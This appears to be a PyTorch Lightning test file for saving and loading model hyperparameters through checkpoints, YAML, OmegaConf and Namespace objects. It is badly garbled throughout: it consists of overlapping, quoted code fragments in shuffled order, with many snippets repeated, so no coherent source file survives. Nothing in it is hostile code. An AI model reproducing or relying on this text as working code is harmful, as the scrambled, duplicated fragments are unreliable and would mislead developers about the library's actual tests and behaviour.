\"\"\" This model has the", "**kwargs) self.argument1 = arg1 # arg2 intentionally not set arg1", "Tests that only the arguments are collected and not local", "self.save_hyperparameters(arg1, arg2) @pytest.mark.parametrize(\"cls,config\", [ (AnotherArgModel, dict(arg1=42)), (OtherArgsModel, dict(arg1=3.14, arg2='abc')), ])", "max_epochs=1, ) trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml)", "LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14,", "= cls(hparams={'test_arg': 14}) # run standard test suite _run_standard_hparams_test(tmpdir, model,", "of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless", "AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): # init model conf = OmegaConf.create(dict(test_arg=14,", "that a model can take regular args and assign \"\"\"", "def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a model can take regular", "1, 'key2': 'abc'}) pkl = pickle.dumps(ad) assert ad == pickle.loads(pkl)", "model.hparams.dict_conf['my_param'] == 'anything' # verify that we can overwrite whatever", "dict(arg1=3.14, arg2='abc')), ]) def test_single_config_models_fail(tmpdir, cls, config): \"\"\" Test fail", "and # limitations under the License. import os import pickle", "= pickle.dumps(ad) assert ad == pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert", "test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel) model = LocalModel.load_from_checkpoint(raw_checkpoint_path,", "[SaveHparamsModel, AssignHparamsModel]) def test_omega_conf_hparams(tmpdir, cls): # init model conf =", "raw_checkpoint_path class LocalVariableModelSuperLast(EvalModelTemplate): \"\"\" This model has the super().__init__() call", "the correct values # trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) #", "do it, it should be assigned # assert model.hparams.my_arg ==", "saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5) trainer.fit(model)", "__init__(self, foo='bar', pickle_me=(lambda x: x + 1), **kwargs): super().__init__(**kwargs) assert", "local_var = 1234 super().__init__(*args, **kwargs) # this is intentionally here", "= _run_standard_hparams_test(tmpdir, model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container)", "super().__init__() self.l1 = torch.nn.Linear(28 * 28, 10) def forward(self, x):", "arg2, *args, **kwargs): self.argument1 = arg1 # arg2 intentionally not", "obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args, **kwargs)", "standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, LocalModel) model =", "learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams)", "the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class", "model.hparams.batch_size == 179 if isinstance(model, 
# -------------------------
# STANDARD TESTS
# -------------------------
def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False):
    """
    Tests for the existence of an arg 'test_arg=14'
    """
    hparam_type = type(model.hparams)

    # test proper property assignments
    assert model.hparams.test_arg == 14

    # verify we can train
    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2)
    trainer.fit(model)

    # make sure the raw checkpoint saved the properties
    raw_checkpoint_path = _raw_checkpoint_path(trainer)
    raw_checkpoint = torch.load(raw_checkpoint_path)
    assert LightningModule.CHECKPOINT_HYPER_PARAMS_KEY in raw_checkpoint
    assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14

    # verify that model loads correctly
    model2 = cls.load_from_checkpoint(raw_checkpoint_path)
    assert model2.hparams.test_arg == 14
    assert isinstance(model2.hparams, hparam_type)

    if try_overwrite:
        # verify that we can overwrite the property
        model3 = cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78)
        assert model3.hparams.test_arg == 78

    return raw_checkpoint_path


@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_namespace_hparams(tmpdir, cls):
    # init model
    model = cls(hparams=Namespace(test_arg=14))

    # run standard test suite
    _run_standard_hparams_test(tmpdir, model, cls)


@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_dict_hparams(tmpdir, cls):
    # init model
    model = cls(hparams={'test_arg': 14})

    # run standard test suite
    _run_standard_hparams_test(tmpdir, model, cls)


@pytest.mark.parametrize("cls", [SaveHparamsModel, AssignHparamsModel])
def test_omega_conf_hparams(tmpdir, cls):
    # init model
    conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)]))
    model = cls(hparams=conf)
    assert isinstance(model.hparams, Container)

    # run standard test suite
    raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls)
    model2 = cls.load_from_checkpoint(raw_checkpoint_path)
    assert isinstance(model2.hparams, Container)

    # config specific tests
    assert model2.hparams.test_arg == 14
    assert model2.hparams.mylist[0] == 15.4
\"\"\" model = cls(arg1=1,", "no other runtime change allowed\"\"\" model = cls(running_arg=123) assert model.hparams.running_arg", "== 179 if isinstance(model, SubClassEvalModel): assert model.hparams.subclass_arg == 1200 if", "we want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size == 99", "cls.load_from_checkpoint(raw_checkpoint_path, test_arg=78) assert model3.hparams.test_arg == 78 return raw_checkpoint_path @pytest.mark.parametrize(\"cls\", [SaveHparamsModel,", "and assign \"\"\" # define model class LocalModel(EvalModelTemplate): def __init__(self,", "= cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate()", "take regular args and assign \"\"\" # define model class", "import cloudpickle import pytest import torch from fsspec.implementations.local import LocalFileSystem", "def __init__(self, hparams): super().__init__() self.hparams = hparams # ------------------------- #", "that we can overwrite whatever we want model = cls.load_from_checkpoint(raw_checkpoint_path,", "model = LocalModel.load_from_checkpoint(raw_checkpoint_path, non_exist_kwarg=99) assert 'non_exist_kwarg' not in model.hparams class", "def test_hparams_save_yaml(tmpdir): hparams = dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml", "the checkpoint saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=1)", "LocalFileSystem from omegaconf import OmegaConf, Container from torch.nn import functional", "Trainer(default_root_dir=tmpdir, max_epochs=1) trainer.fit(model) # verify that we can overwrite whatever", "PyTorch Lightning team. # # Licensed under the Apache License,", "arg1 # arg2 intentionally not set arg1 = 'overwritten' local_var", "**kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def", "self.hparams = kwargs @pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test", "at the end. 
\"\"\" def __init__(self, arg1, arg2, *args, **kwargs):", "object with explicit setter \"\"\" def __init__(self, hparams): super().__init__() self.hparams", "max_epochs=1) trainer.fit(model) raw_checkpoint_path = _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an", "LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\" Tests that only", "object \"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\"", "+ 1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters() def test_hparams_pickle_warning(tmpdir):", "super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) # run standard test", "raw_checkpoint_path) # verify that model loads correctly model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path)", "the initial hparams, no other runtime change allowed\"\"\" model =", "def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() # verify we can", "assert model.hparams.running_arg == 123 model.hparams.running_arg = -1 assert model.hparams.running_arg ==", "valid class arguments.\"\"\" class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size) self.save_hyperparameters()", "super().__init__(*args, **kwargs) # this is intentionally here at the end", "in model.hparams assert model.hparams['arg1'] == 'overwritten' assert model.hparams['arg2'] == 2", "test_arg, test_arg2): super().__init__() self.save_hyperparameters() model = LocalModel(test_arg=14, test_arg2=90) # run", "verify that model loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert", "@pytest.mark.parametrize(\"cls\", [RuntimeParamChangeModelSaving, RuntimeParamChangeModelAssign]) def test_init_arg_with_runtime_change(tmpdir, cls): \"\"\"Test that we save/export", "extra_args.update(my_loss=torch.nn.CosineEmbeddingLoss()) elif cls is DictConfSubClassEvalModel: extra_args.update(dict_conf=OmegaConf.create(dict(my_param='anything'))) model = cls(**extra_args) assert", "verify we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model)", "None # pretend EvalModelTemplate did not call self.save_hyperparameters() self.hparams =", "= Namespace(abc=42) assert model.hparams.abc == 42 trainer = Trainer( default_root_dir=tmpdir,", "\"*args\" and \"**kwargs\". 
\"\"\" def __init__(obj, *more_args, other_arg=300, **more_kwargs): #", "loads correctly # raw_checkpoint_path = _raw_checkpoint_path(trainer) # model = cls.load_from_checkpoint(raw_checkpoint_path)", "def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg', 'test_arg2') model = LocalModel(test_arg=14,", "assert 'non_exist_kwarg' not in model.hparams class SuperClassPositionalArgs(EvalModelTemplate): def __init__(self, hparams):", "import DataLoader from pytorch_lightning import Trainer, LightningModule from pytorch_lightning.core.saving import", "**more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')), **kwargs): super().__init__(*args,", "dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ]) # def test_single_config_models(tmpdir, cls,", "this is intentionally here at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst,", "OR CONDITIONS OF ANY KIND, either express or implied. #", "forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch, batch_nb): x,", "trainer.fit(model) path_yaml = os.path.join(trainer.logger.log_dir, trainer.logger.NAME_HPARAMS_FILE) hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg')", "arg1 = 'overwritten' local_var = 1234 super().__init__(*args, **kwargs) # this", "pickled. \"\"\" def __init__(self, foo='bar', pickle_me=(lambda x: x + 1),", "we can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) #", "# ]) # def test_single_config_models(tmpdir, cls, config): # \"\"\" Test", "the License is distributed on an \"AS IS\" BASIS, #", "model can take implicit args and assign \"\"\" # define", "dict(batch_size=32, learning_rate=0.001, data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml,", "assert ad == pickle.loads(pkl) pkl = cloudpickle.dumps(ad) assert ad ==", "__init__(self, *args, my_loss=torch.nn.CrossEntropyLoss(), **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\"", "raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model loads correctly model", "model.hparams.test_arg2 == 120 def test_explicit_missing_args_hparams(tmpdir): \"\"\" Tests that a model", "_ = a.hparams def test2(self): test_outside() test_outside() A().test2() A().test() class", "end. 
\"\"\" def __init__(self, arg1, arg2, *args, **kwargs): self.argument1 =", "batch_size=32) trainer.fit(model, train_loader) test_loader = DataLoader(TrialMNIST(os.getcwd(), train=False, download=True), batch_size=32) trainer.test(test_dataloaders=test_loader)", "10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch,", "the super class \"\"\" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs)", "model.hparams # test_arg2 is not registered in class init return", "def _run_standard_hparams_test(tmpdir, model, cls, try_overwrite=False): \"\"\" Tests for the existence", "trainer.test(test_dataloaders=test_loader) def test_model_ignores_non_exist_kwargument(tmpdir): \"\"\"Test that the model takes only valid", "BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a model can take", "def test_omega_conf_hparams(tmpdir, cls): # init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4,", "law or agreed to in writing, software # distributed under", "whatever we want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size ==", "from pytorch_lightning import Trainer, LightningModule from pytorch_lightning.core.saving import save_hparams_to_yaml, load_hparams_from_yaml", "123 model.hparams.running_arg = -1 assert model.hparams.running_arg == -1 model.hparams =", "at the end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def", "model should accept hparams and init in the super class", "OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))),", "# define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg, test_arg2): super().__init__()", "== 'overwritten' assert model.hparams['arg2'] == 2 # @pytest.mark.parametrize(\"cls,config\", [ #", "foo='bar', pickle_me=(lambda x: x + 1), **kwargs): super().__init__(**kwargs) assert not", "may obtain a copy of the License at # #", "data_root='./any/path/here', nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert", "obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self, *args, dict_conf=OmegaConf.create(dict(my_param='something')),", "checkpoint saved the correct values trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)", "init model conf = OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model =", "cls) @pytest.mark.parametrize(\"cls\", [SaveHparamsModel, AssignHparamsModel]) def test_dict_hparams(tmpdir, cls): # init model", "may not use this file except in compliance with the", "modules are always nn.Module a = MyModule() assert isinstance(a, torch.nn.Module)", "that the checkpoint saved the correct values # trainer =", "(SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel,", "this file except in compliance with the License. 
# You", "= _raw_checkpoint_path(trainer) with pytest.raises(TypeError, match=\"__init__\\(\\) got an unexpected keyword argument", "a = MyModule() _ = a.hparams class A: def test(self):", "in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model", "= LocalModel(test_arg=14, test_arg2=90) # test proper property assignments assert model.hparams.test_arg", "# arg2 intentionally not set arg1 = 'overwritten' local_var =", "== pickle.loads(pkl) class UnpickleableArgsEvalModel(EvalModelTemplate): \"\"\" A model that has an", "model2.hparams.mylist[0] == 15.4 def test_explicit_args_hparams(tmpdir): \"\"\" Tests that a model", "Lightning team. # # Licensed under the Apache License, Version", "verify that the checkpoint saved the correct values trainer =", "cls): # init model model = cls(hparams={'test_arg': 14}) # run", "# # Licensed under the Apache License, Version 2.0 (the", "**kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self, *args,", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS", "MyModule() assert isinstance(a, torch.nn.Module) def test_outside(): a = MyModule() _", "= torch.nn.Linear(28 * 28, 10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0),", "model can take an object with explicit setter \"\"\" def", "Container) assert model.hparams.dict_conf['my_param'] == 'anything' # verify that we can", "super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class AggSubClassEvalModel(SubClassEvalModel): def __init__(self,", "in raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['batch_size'] == 179 # verify that model", "raw_checkpoint assert raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]['test_arg'] == 14 # verify that model loads", "constructor \"\"\" # model = cls(config) # # # no", "team. # # Licensed under the Apache License, Version 2.0", "import EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\" Tests that a", "def test_hparams_pickle_warning(tmpdir): model = UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with", "only valid class arguments.\"\"\" class LocalModel(EvalModelTemplate): def __init__(self, batch_size=15): super().__init__(batch_size=batch_size)", "want model = cls.load_from_checkpoint(raw_checkpoint_path, batch_size=99) assert model.hparams.batch_size == 99 def", "(AssignHparamsModel, Namespace(my_arg=42)), # (AssignHparamsModel, dict(my_arg=42)), # (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))), # ])", "class takes positional arg, subclass takes varargs. 
\"\"\" hparams =", "MyModule() _ = a.hparams def test2(self): test_outside() test_outside() A().test2() A().test()", "def __init__(self, arg1, arg2, *args, **kwargs): self.argument1 = arg1 #", "an object \"\"\" def __init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate):", "keyword argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__()", "nasted=dict(any_num=123, anystr='abcd')) path_yaml = os.path.join(tmpdir, 'testing-hparams.yaml') save_hparams_to_yaml(path_yaml, hparams) assert load_hparams_from_yaml(path_yaml)", "== -1 model.hparams = Namespace(abc=42) assert model.hparams.abc == 42 trainer", "= UnpickleableArgsEvalModel() trainer = Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me'", "max_epochs=1, default_root_dir=tmpdir, ) train_loader = DataLoader(TrialMNIST(os.getcwd(), train=True, download=True), batch_size=32) trainer.fit(model,", "x: x + 1), **kwargs): super().__init__(**kwargs) assert not is_picklable(pickle_me) self.save_hyperparameters()", "# verify that we can overwrite the property model3 =", "or implied. # See the License for the specific language", "= F.cross_entropy(self(x), y) return {'loss': loss, 'log': {'train_loss': loss}} def", "is_picklable from tests.base import EvalModelTemplate, TrialMNIST, BoringModel class SaveHparamsModel(EvalModelTemplate): \"\"\"", "that has an attribute that cannot be pickled. \"\"\" def", "def __init__(self, test_arg, test_arg2): super().__init__() self.save_hyperparameters('test_arg') model = LocalModel(test_arg=14, test_arg2=90)", "can train trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make", "it cannot be pickled\"): trainer.fit(model) assert 'pickle_me' not in model.hparams", "_ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model =", "LocalModel(test_arg=14, test_arg2=90) # test proper property assignments assert model.hparams.test_arg ==", "_run_standard_hparams_test(tmpdir, model, cls) model2 = cls.load_from_checkpoint(raw_checkpoint_path) assert isinstance(model2.hparams, Container) #", "end @pytest.mark.parametrize(\"cls\", [ LocalVariableModelSuperFirst, # LocalVariableModelSuperLast, ]) def test_collect_init_arguments_with_local_vars(cls): \"\"\"", "argument 'test'\"): SubClassVarArgs.load_from_checkpoint(raw_checkpoint_path) class RuntimeParamChangeModelSaving(BoringModel): def __init__(self, **kwargs): super().__init__() self.save_hyperparameters()", "= raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace' raw_checkpoint[past_key]['batch_size'] = -17 del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]", "model loads correctly model = LocalModel.load_from_checkpoint(raw_checkpoint_path, test_arg2=123) assert model.hparams.test_arg ==", "run standard test suite raw_checkpoint_path = _run_standard_hparams_test(tmpdir, model, cls) model2", "\"\"\" A model that has unconventional names for \"self\", \"*args\"", "14}) # run standard test suite _run_standard_hparams_test(tmpdir, model, cls) @pytest.mark.parametrize(\"cls\",", "correctly model = cls.load_from_checkpoint(raw_checkpoint_path) assert model.hparams.batch_size == 179 if isinstance(model,", "my_loss=torch.nn.CrossEntropyLoss(), **kwargs): 
super().__init__(*args, **kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model", "that only the arguments are collected and not local variables.", "you do it, it should be assigned # assert model.hparams.my_arg", "= Trainer(default_root_dir=tmpdir, max_steps=1) with pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from hparams", "*args, subclass_arg=1200, **kwargs): super().__init__(*args, **kwargs) self.save_hyperparameters() class SubSubClassEvalModel(SubClassEvalModel): pass class", "model that has an attribute that cannot be pickled. \"\"\"", "import AttributeDict, is_picklable from tests.base import EvalModelTemplate, TrialMNIST, BoringModel class", "__init__(self): super().__init__() self.l1 = torch.nn.Linear(28 * 28, 10) def forward(self,", "return {'loss': loss, 'log': {'train_loss': loss}} def test_step(self, batch, batch_nb):", "__init__(self, arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs) self.argument1 = arg1", "tests assert model.hparams.test_arg2 == 120 def test_implicit_args_hparams(tmpdir): \"\"\" Tests that", "= os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x for x in raw_checkpoint_paths if", "model.hparams.my_arg == 42 class AnotherArgModel(EvalModelTemplate): def __init__(self, arg1): super().__init__() self.save_hyperparameters(arg1)", "end. \"\"\" def __init__(self, arg1, arg2, *args, **kwargs): super().__init__(*args, **kwargs)", "# (SaveHparamsModel, dict(my_arg=42)), # (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))), # (AssignHparamsModel, Namespace(my_arg=42)), #", "test_arg2=123) assert model.hparams.test_arg == 14 assert 'test_arg2' not in model.hparams", "**kwargs) self.save_hyperparameters() class UnconventionalArgsEvalModel(EvalModelTemplate): \"\"\" A model that has unconventional", "['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model = EvalModelTemplate() # verify we", "= OmegaConf.create(dict(test_arg=14, mylist=[15.4, dict(a=1, b=2)])) model = cls(hparams=conf) assert isinstance(model.hparams,", "raw_checkpoint_paths if '.ckpt' in x] assert raw_checkpoint_paths raw_checkpoint_path = raw_checkpoint_paths[0]", "intentionally named obj super().__init__(*more_args, **more_kwargs) obj.save_hyperparameters() class DictConfSubClassEvalModel(SubClassEvalModel): def __init__(self,", "pytest.raises(ValueError): _ = cls(**config) @pytest.mark.parametrize(\"past_key\", ['module_arguments']) def test_load_past_checkpoint(tmpdir, past_key): model", "[SaveHparamsModel, AssignHparamsModel]) def test_namespace_hparams(tmpdir, cls): # init model model =", "trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2) trainer.fit(model) # make sure the", "load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, OmegaConf.create(hparams)) assert load_hparams_from_yaml(path_yaml) == hparams class", "test2(self): test_outside() test_outside() A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss()", "def test_namespace_hparams(tmpdir, cls): # init model model = cls(hparams=Namespace(test_arg=14)) #", "_raw_checkpoint_path(trainer) raw_checkpoint = torch.load(raw_checkpoint_path) raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY] raw_checkpoint['hparams_type'] = 'Namespace'", "assert load_hparams_from_yaml(path_yaml) == hparams save_hparams_to_yaml(path_yaml, AttributeDict(hparams)) assert 
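# --- editor's illustrative sketch (not part of the original test suite) ------
# The checkpoint assertions above rely on Lightning storing the collected
# hparams inside the raw checkpoint dict under
# `LightningModule.CHECKPOINT_HYPER_PARAMS_KEY`. A hypothetical helper to peek
# at that entry, assuming `ckpt_path` points at a saved .ckpt file:
def _peek_saved_hparams(ckpt_path):
    raw = torch.load(ckpt_path)
    return raw.get(LightningModule.CHECKPOINT_HYPER_PARAMS_KEY, {})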
class LocalVariableModelSuperLast(EvalModelTemplate):
    """ This model has the super().__init__() call at the end. """

    def __init__(self, arg1, arg2, *args, **kwargs):
        self.argument1 = arg1  # arg2 intentionally not set
        arg1 = 'overwritten'
        local_var = 1234
        super().__init__(*args, **kwargs)  # this is intentionally here at the end


class LocalVariableModelSuperFirst(EvalModelTemplate):
    """ This model has the _auto_collect_arguments() call at the end. """

    def __init__(self, arg1, arg2, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.argument1 = arg1  # arg2 intentionally not set
        arg1 = 'overwritten'
        local_var = 1234
        self.save_hyperparameters()  # this is intentionally here at the end


@pytest.mark.parametrize("cls", [
    LocalVariableModelSuperFirst,
    # LocalVariableModelSuperLast,
])
def test_collect_init_arguments_with_local_vars(cls):
    """ Tests that only the arguments are collected and not local variables. """
    model = cls(arg1=1, arg2=2)
    assert 'local_var' not in model.hparams
    assert model.hparams['arg1'] == 'overwritten'
    assert model.hparams['arg2'] == 2


# @pytest.mark.parametrize("cls,config", [
#     (SaveHparamsModel, Namespace(my_arg=42)),
#     (SaveHparamsModel, dict(my_arg=42)),
#     (SaveHparamsModel, OmegaConf.create(dict(my_arg=42))),
#     (AssignHparamsModel, Namespace(my_arg=42)),
#     (AssignHparamsModel, dict(my_arg=42)),
#     (AssignHparamsModel, OmegaConf.create(dict(my_arg=42))),
# ])
# def test_single_config_models(tmpdir, cls, config):
#     """ Test that the model automatically saves the arguments passed into the constructor """
#     model = cls(config)
#
#     # no matter how you do it, it should be assigned
#     assert model.hparams.my_arg == 42
#
#     # verify that the checkpoint saved the correct values
#     trainer = Trainer(default_root_dir=tmpdir, max_epochs=2, overfit_batches=0.5)
#     trainer.fit(model)
#
#     # verify that model loads correctly
#     raw_checkpoint_path = _raw_checkpoint_path(trainer)
#     model = cls.load_from_checkpoint(raw_checkpoint_path)
#     assert model.hparams.my_arg == 42


class AnotherArgModel(EvalModelTemplate):
    def __init__(self, arg1):
        super().__init__()
        self.save_hyperparameters(arg1)


class OtherArgsModel(EvalModelTemplate):
    def __init__(self, arg1, arg2):
        super().__init__()
        self.save_hyperparameters(arg1, arg2)


@pytest.mark.parametrize("cls,config", [
    (AnotherArgModel, dict(arg1=42)),
    (OtherArgsModel, dict(arg1=3.14, arg2='abc')),
])
def test_single_config_models_fail(tmpdir, cls, config):
    """ Test fail on passing unsupported config type. """
    with pytest.raises(ValueError):
        _ = cls(**config)


@pytest.mark.parametrize("past_key", ['module_arguments'])
def test_load_past_checkpoint(tmpdir, past_key):
    model = EvalModelTemplate()

    # verify we can train
    trainer = Trainer(default_root_dir=tmpdir, max_epochs=1, overfit_batches=2)
    trainer.fit(model)

    # make sure the raw checkpoint saved the properties
    raw_checkpoint_path = _raw_checkpoint_path(trainer)
    raw_checkpoint = torch.load(raw_checkpoint_path)
    raw_checkpoint[past_key] = raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
    raw_checkpoint['hparams_type'] = 'Namespace'
    raw_checkpoint[past_key]['batch_size'] = -17
    del raw_checkpoint[LightningModule.CHECKPOINT_HYPER_PARAMS_KEY]
    # save back the checkpoint
    torch.save(raw_checkpoint, raw_checkpoint_path)

    # verify that model loads correctly
    model2 = EvalModelTemplate.load_from_checkpoint(raw_checkpoint_path)
    assert model2.hparams.batch_size == -17
\"\"\" def __init__(obj, *more_args, other_arg=300, **more_kwargs):", "torch.nn.Linear(28 * 28, 10) def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1)))", "__init__(self, hparams): super().__init__() self.save_hyperparameters(hparams) class AssignHparamsModel(EvalModelTemplate): \"\"\" Tests that a", "this is intentionally here at the end class LocalVariableModelSuperFirst(EvalModelTemplate): \"\"\"", "def forward(self, x): return torch.relu(self.l1(x.view(x.size(0), -1))) def training_step(self, batch, batch_nb):", "DictConfSubClassEvalModel): assert isinstance(model.hparams.dict_conf, Container) assert model.hparams.dict_conf['my_param'] == 'anything' # verify", "that the model automatically saves the arguments passed into the", "def _raw_checkpoint_path(trainer) -> str: raw_checkpoint_paths = os.listdir(trainer.checkpoint_callback.dirpath) raw_checkpoint_paths = [x", "# def test_single_config_models(tmpdir, cls, config): # \"\"\" Test that the", "pytest.warns(UserWarning, match=\"attribute 'pickle_me' removed from hparams because it cannot be", "A().test2() A().test() class SubClassEvalModel(EvalModelTemplate): any_other_loss = torch.nn.CrossEntropyLoss() def __init__(self, *args,", "# distributed under the License is distributed on an \"AS", "assign \"\"\" # define model class LocalModel(EvalModelTemplate): def __init__(self, test_arg,", "# Unless required by applicable law or agreed to in", "-1 assert model.hparams.running_arg == -1 model.hparams = Namespace(abc=42) assert model.hparams.abc", "# init model model = cls(hparams={'test_arg': 14}) # run standard", "\"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY", "hparams = load_hparams_from_yaml(path_yaml) assert hparams.get('running_arg') == 123 class UnsafeParamModel(BoringModel): def", "= MyModule() _ = 